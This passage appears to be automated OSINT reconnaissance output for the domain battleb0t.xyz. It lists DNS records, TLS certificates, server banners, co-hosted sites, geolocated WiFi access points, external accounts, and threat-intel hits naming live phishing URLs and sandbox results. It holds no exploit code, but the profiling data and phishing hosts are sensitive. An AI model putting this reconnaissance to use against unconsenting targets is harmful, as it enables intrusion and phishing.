"sandrine.barillot.me": {"record_type": "CNAME", "resolved_at": "2023-03-12T16:19:18.691253010Z"}, "unitedanimations.info": {"record_type": "A", "resolved_at": "2023-01-29T02:20:44.771224615Z"}, "cyberfriendscircle.io": {"record_type": "A", "resolved_at": 
"2023-04-23T17:40:41.917214504Z"}, "dhanush.is-a.dev": {"record_type": "CNAME", "resolved_at": "2023-03-09T23:39:54.025920340Z"}, "static.test.habuhome.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:22:37.725893073Z"}, "www.jtjan.me": {"record_type": "CNAME", "resolved_at": "2023-03-21T02:40:52.835663110Z"}, "wise.fitness": {"record_type": "A", "resolved_at": "2023-03-07T15:51:26.458635165Z"}, "theodd.website": {"record_type": "A", "resolved_at": "2023-03-19T03:21:30.685920747Z"}, "djalyssa.ru": {"record_type": "A", "resolved_at": "2023-04-22T20:21:58.054821229Z"}, "www.unixlife.dev": {"record_type": "CNAME", "resolved_at": "2022-10-04T14:32:50.060827864Z"}, "www.kadupitiya.lk": {"record_type": "CNAME", "resolved_at": "2023-02-24T16:44:15.687183626Z"}, "robimsinazor.sk": {"record_type": "A", "resolved_at": "2023-02-22T21:18:54.646853756Z"}, "www.johnhammond.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:27.017906781Z"}, "wanderandcompass.com": {"record_type": "A", "resolved_at": "2023-03-18T22:39:25.125598440Z"}, "vishvak.com": {"record_type": "A", "resolved_at": "2023-05-11T22:16:52.855230065Z"}, "www.uocsclub.ca": {"record_type": "CNAME", "resolved_at": "2023-04-20T16:20:28.858631812Z"}, "t.iiwhy.cn": {"record_type": "CNAME", "resolved_at": "2023-03-09T12:46:57.908049390Z"}, "rpg.skmobi.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:42:56.247014800Z"}, "www.staceywu.co.uk": {"record_type": "CNAME", "resolved_at": "2023-03-05T19:59:23.259144477Z"}, "intersolarnft.github.io": {"record_type": "A", "resolved_at": "2023-03-10T00:16:10.689229599Z"}, "get.intersolar-nft.com": {"record_type": "CNAME", "resolved_at": "2022-09-29T13:43:22.976827994Z"}, "www.agitator.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T13:20:02.173553830Z"}, "www.teamhtp.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T05:24:15.762157977Z"}, "resume.hellodmo.com": {"record_type": "CNAME", "resolved_at": 
"2023-03-23T15:26:25.908256359Z"}}, "names": ["kleinsplayground.com", "www.agitator.com", "maxkross.github.io", "www.vanessaduque.studio", "djalyssa.ru", "hollisis.me", "cyberfriendscircle.io", "editor.ifmledit.org", "mjlee.dev", "modelr.tidyverse.org", "www.wise.fitness", "docs.aslbeverlygreen1.fr", "www.secure-ai.systems", "visbol.org", "viameumie.ivankz.com", "meteo-parapente.github.io", "sean | 185.199.109.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | codeforces (Category: coding)
https://codeforces.com/profile/login | login |
| 2023-05-12 02:44:13 | IP Address | No | DNS Resolver | 204 | 0 | 1 | 0 | None | 185.199.111.153 | battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c564d9c4d65692b-FRA
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.47): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:17 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'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', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'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', 
u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'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', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | oldfluid.battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 02:32:42 (Net ID: 00:02:2D:01:53:95) | 37.7642, -122.3993 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | #LG@Vo1P*Service& (Net ID: 00:01:36:57:A4:17) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Jupiter (Net ID: 00:02:2D:66:D2:49) | 50.1188, 8.6843 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Microsoft Technet Community (Category: tech)
https://social.technet.microsoft.com/profile/login/ | login |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomAC2DD8 (Net ID: 00:0C:F6:AC:2D:D8) | 50.8897, 6.0563 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5e4216390f2caf-ORD
| 188.114.96.1 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT8QH8gLT (Net ID: E0:22:02:14:AB:06) | 37.751, -97.822 |
| 2023-05-12 02:56:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
67:78:0f:c0:b3:05:0b:42:0e:1c:78:58:8a:88:56:0d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Nov 17 08:19:18 2022 GMT
Not After : Feb 15 08:19:17 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:a3:01:61:a3:c8:87:25:e7:fe:c0:1a:32:3c:c6:
da:64:8b:b5:50:60:2b:c0:e8:58:1f:54:74:29:d7:
0b:35:57:ae:f0:78:a5:6a:4d:cb:a8:98:c4:c6:08:
24:6e:38:c0:cc:16:fb:e7:ce:21:ed:5f:2c:c4:e9:
e1:ff:82:8a:ca:a0:fe:ce:4a:08:f4:8a:91:e3:98:
af:3f:35:a0:b7:82:16:66:79:8f:d4:5d:c4:1a:c4:
1c:5a:e2:e2:40:e3:be:d7:73:e5:51:b3:f0:08:0d:
a6:31:11:c5:bc:1d:5c:d2:b0:47:24:f8:d9:1e:d9:
72:fd:86:0b:d6:ac:4a:39:ad:f4:43:e7:b6:d3:16:
b9:d1:e5:c9:06:1d:ce:7c:25:06:4b:96:f2:9e:cb:
95:bc:80:ba:d7:9a:27:c3:51:67:b3:b0:6a:3f:9a:
e8:0b:b4:16:de:be:54:b1:18:14:ad:76:c7:23:c1:
08:4f:b6:99:58:df:3e:de:3d:0b:39:ef:c8:1d:bd:
ed:09:cf:81:92:ec:d8:74:46:47:9c:a4:42:fc:96:
89:c3:55:1e:f4:e7:49:b0:1d:55:06:19:4e:28:13:
c2:a1:7a:ff:d1:4f:38:19:a3:e0:4d:5a:68:ce:ea:
96:c0:01:60:48:f3:a6:ac:5d:db:48:50:b3:86:27:
96:7d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
61:B8:A8:F3:B0:F5:FF:35:6D:A7:1D:C8:69:9E:4B:49:3E:DA:20:38
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/_haK7tXOc_M
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/QAbdIRPj4FY.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
33:ae:dc:a9:41:b2:ff:76:d8:16:a0:d6:b1:5d:1b:db:3c:51:
93:a6:fd:af:36:c1:59:1e:4b:0d:e6:0a:68:f5:5b:67:34:d6:
7c:a2:8f:90:10:2f:aa:b0:12:bb:81:fd:67:15:ed:d9:15:c1:
8f:5d:b8:52:a6:bc:40:4e:a4:3f:43:ef:65:92:60:20:d0:12:
48:ce:4b:b9:00:fd:36:8b:76:61:50:e7:da:3c:1a:3a:5f:db:
72:c2:bd:1e:38:be:f8:8e:de:f4:a4:78:e4:01:fa:06:51:d3:
6a:dc:fa:a9:19:00:c1:ae:b4:9f:af:62:50:c9:10:65:a2:ca:
97:5d:f7:7c:0c:f6:19:9f:39:9c:60:58:85:b8:8d:be:0a:5d:
7e:8f:0f:cd:3f:06:a9:b3:21:ec:e6:b3:e0:c5:3a:b8:3f:7c:
01:a3:c7:7d:dc:0a:7a:49:a1:6a:53:99:e3:04:53:97:7c:d1:
e8:e0:e6:80:50:bc:c9:d5:7f:a1:e4:1f:6b:f6:56:fd:81:32:
7b:6a:77:24:be:21:62:cb:d5:73:03:e6:d0:24:96:0d:16:ad:
36:c7:39:57:be:6a:0c:e1:3c:be:e8:78:08:a6:c6:71:fa:55:
b9:72:10:a6:f0:bd:1e:37:78:64:35:f8:06:57:c1:5e:e2:2e:
f5:04:6b:a3
|
| 2023-05-12 02:44:18 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.111.153 |
| 2023-05-12 02:46:36 | Netblock Membership | No | RIPE | 2 | 0 | 3 | 0 | None | 34.148.96.0/20 | 34.148.97.127 |
| 2023-05-12 03:31:58 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.0:8443 | 188.114.97.0/24 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00saadchaudhry.github.io]
https://www.openphish.com/feed.txt | 00saadchaudhry.github.io |
| 2023-05-12 02:54:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://npbruce.github.io/valkyrie/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:2076:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2076:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "Local\\SM0:3120:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:3120:120:WilError_01"\n "SM0:3120:304:WilStaging_02"\n "SM0:3120:120:WilError_01"\n "Local\\SM0:2076:120:WilError_01"\n "Local\\SM0:2076:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:2076:304:WilStaging_02"\n "SM0:2076:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:2076:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2076:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "142.251.46.234:443"\n "172.217.164.99:443"\n 
"192.30.255.116:443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00002076]\n "typosquatting_list.pb" has type "data"- Location: [%TEMP%\\2076_314052531\\typosquatting_list.pb]- [targetUID: 00000000-00002076]\n "f38969098ae50137_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\f38969098ae50137_0]- [targetUID: 00000000-00002076]\n "ad000e355b853159_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\ad000e355b853159_0]- [targetUID: 00000000-00002076]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002076]\n "f_00023e" has type "PNG image data 2394 x 1466 8-bit colormap non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00005516]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\manifest.json]- [targetUID: 00000000-00002076]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\manifest.fingerprint]- [targetUID: 00000000-00002076]\n "f_000243" has type "PNG image data 2880 x 1800 8-bit/color RGBA non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 
00000000-00005516]\n "f_00023d" has type "gzip compressed data from Unix original size modulo 2^32 125617"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002076]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\2076_2098649151\\adblock_snippet.js]- [targetUID: 00000000-00002076]\n "5a44bc8f-8ac3-49ff-81e3-d2694fc74cc3.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\5a44bc8f-8ac3-49ff-81e3-d2694fc74cc3.tmp]- [targetUID: 00000000-00002076]\n "361997ab-354a-4d80-b2b8-2a99e7ad455e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\361997ab-354a-4d80-b2b8-2a99e7ad455e.tmp]- [targetUID: 00000000-00002076]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006184]\n "ad9deeb0-01f3-4e2c-89b5-726ac2308ce5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ad9deeb0-01f3-4e2c-89b5-726ac2308ce5.tmp]- [targetUID: 00000000-00002076]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00002076]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.44\\Ruleset Data]- [targetUID: 00000000-00002076]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\edge_driver.js]- [targetUID: 00000000-00002076]'}, {u'category': u'Network Related', u'origin': u'File/Memory', 
u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://reactjs.org/docs/error-decoder.html?invariant=+e,n=1;n"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://npbruce.github.io/valkyrie/"\n Pattern match: "http://www.w3.org/2000/svg\\n"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "https://npbruce.github.io"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://idsync.rlcdn.com,supports_spdy:true},{isolation:[],server:https://pippio.com,supports_spdy:true},{isolation:[],server:https://assets.msn.com,supports_spdy:true},{isolation:[],server:https://ntp.msn.com,supports_spdy:true}"\n Pattern match: "npbruce.github.io/valkyrie/"\n Heuristic match: "pbruce.github.io"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 
Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 172.217.164.99"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002076]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\2076_2098649151\\adblock_snippet.js]- [targetUID: 00000000-00002076]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\edge_driver.js]- [targetUID: 00000000-00002076]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\shopping.js]- [targetUID: 00000000-00002076]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002076]\n "product_page.js" has type "Unknown"- Location: [%TEMP%\\2076_1612304720\\product_page.js]- [targetUID: 00000000-00002076]\n "shoppingfre.js" has type "Unknown"- Location: [%TEMP%\\2076_1612304720\\shoppingfre.js]- [targetUID: 00000000-00002076]\n "shopping_iframe_driver.js" has 
type "Unknown"- Location: [%TEMP%\\2076_1612304720\\shopping_iframe_driver.js]- [targetUID: 00000000-00002076]\n "auto_open_controller.js" has type "Unknown"- Location: [%TEMP%\\2076_1612304720\\auto_open_controller.js]- [targetUID: 00000000-00002076]\n "edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\2076_1612304720\\edge_tracking_page_validator.js]- [targe | 185.199.109.153 |
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.137): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:32 | Raw Data from RIRs | No | PhishStats | 0 | 0 | 2 | 0 | None | [{u'page_text': u' ', u'domain': None, u'virus_total': None, u'n_times_seen_ip': None, u'abuse_contact': None, u'ip': u'185.199.109.153', u'google_safebrowsing': None, u'threat_crowd': None, u'n_times_seen_domain': None, u'alexa_rank_host': None, u'id': 2310541, u'city': u'', u'abuse_ch_malware': None, u'countrycode': u'NL', u'title': u'Payment request', u'ssl_subject': None, u'technology': None, u'date_update': u'2020-12-08T01:50:24.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': None, u'vulns': None, u'latitude': u'52', u'regionname': u'', u'hash': u'626571f292283f42d1621b3d7cb9aa87ba7a14a373f3205743438d2b0b3807b0', u'threat_crowd_subdomain_count': None, u'screenshot': None, u'n_times_seen_host': None, u'ssl_issuer': None, u'domain_registered_n_days_ago': None, u'regioncode': u'', u'host': u'binance-eth.github.io', u'date': u'2018-07-08T03:03:10.000Z', u'asn': u'AS54113', u'tags': None, u'bgp': u'185.199.108.0/22', u'url': u'http://binance-eth.github.io/', u'isp': u'FASTLY - Fastly, US', u'longitude': u'4.89950000', u'ports': None, u'countryname': u'Netherlands', u'threat_crowd_votes': None, u'http_server': None, u'tld': u'io', u'os': None, u'http_code': None}] | 185.199.109.153 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.21): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:26 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 188.114.96.1:443 | 188.114.96.1 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 6 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:56:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://mashreq-dispute-refund-edd7e6.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "184.50.50.164:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1708"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n 